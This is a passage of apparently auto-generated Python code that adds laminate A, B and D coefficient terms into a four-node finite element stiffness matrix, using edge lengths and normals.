k0[i3*dof+1, i3*dof+4] += Ac*((B22*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B26*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i3*dof+1, i4*dof+0] += Ac*((A12*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + A16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (A26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + A66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i3*dof+1, i4*dof+1] += Ac*((A22*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + A26*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (A26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + A66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i3*dof+1, i4*dof+3] += Ac*((B12*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i3*dof+1, i4*dof+4] += Ac*((B22*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B26*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i3*dof+3, i1*dof+0] += Ac*((B11*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B16*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i3*dof+3, i1*dof+1] += Ac*((B12*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i3*dof+3, i1*dof+3] += Ac*((D11*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + D16*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (D16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + D66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i3*dof+3, i1*dof+4] += Ac*((D12*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + D26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (D16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + D66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i3*dof+3, i2*dof+0] += Ac*((B11*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B16*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i3*dof+3, i2*dof+1] += Ac*((B12*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i3*dof+3, i2*dof+3] += Ac*((D11*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + D16*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (D16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + D66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i3*dof+3, i2*dof+4] += Ac*((D12*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + D26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (D16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + D66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i3*dof+3, i3*dof+0] += Ac*((B11*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B16*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i3*dof+3, i3*dof+1] += Ac*((B12*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i3*dof+3, i3*dof+3] += Ac*((D11*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + D16*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (D16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + D66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i3*dof+3, i3*dof+4] += Ac*((D12*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + D26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (D16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + D66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i3*dof+3, i4*dof+0] += Ac*((B11*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B16*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i3*dof+3, i4*dof+1] += Ac*((B12*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i3*dof+3, i4*dof+3] += Ac*((D11*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + D16*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (D16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + D66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i3*dof+3, i4*dof+4] += Ac*((D12*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + D26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (D16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + D66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i3*dof+4, i1*dof+0] += Ac*((B12*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i3*dof+4, i1*dof+1] += Ac*((B22*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B26*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i3*dof+4, i1*dof+3] += Ac*((D12*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + D16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (D26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + D66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i3*dof+4, i1*dof+4] += Ac*((D22*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + D26*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (D26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + D66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i3*dof+4, i2*dof+0] += Ac*((B12*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i3*dof+4, i2*dof+1] += Ac*((B22*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B26*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i3*dof+4, i2*dof+3] += Ac*((D12*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + D16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (D26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + D66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i3*dof+4, i2*dof+4] += Ac*((D22*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + D26*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (D26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + D66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i3*dof+4, i3*dof+0] += Ac*((B12*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i3*dof+4, i3*dof+1] += Ac*((B22*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B26*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i3*dof+4, i3*dof+3] += Ac*((D12*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + D16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (D26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + D66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i3*dof+4, i3*dof+4] += Ac*((D22*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + D26*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (D26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + D66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i3*dof+4, i4*dof+0] += Ac*((B12*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i3*dof+4, i4*dof+1] += Ac*((B22*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B26*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i3*dof+4, i4*dof+3] += Ac*((D12*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + D16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (D26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + D66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i3*dof+4, i4*dof+4] += Ac*((D22*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + D26*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (D26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + D66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i4*dof+0, i1*dof+0] += Ac*((A11*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + A16*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (A16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + A66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i4*dof+0, i1*dof+1] += Ac*((A12*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + A26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (A16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + A66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i4*dof+0, i1*dof+3] += Ac*((B11*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B16*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i4*dof+0, i1*dof+4] += Ac*((B12*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i4*dof+0, i2*dof+0] += Ac*((A11*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + A16*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (A16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + A66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i4*dof+0, i2*dof+1] += Ac*((A12*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + A26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (A16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + A66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i4*dof+0, i2*dof+3] += Ac*((B11*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B16*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
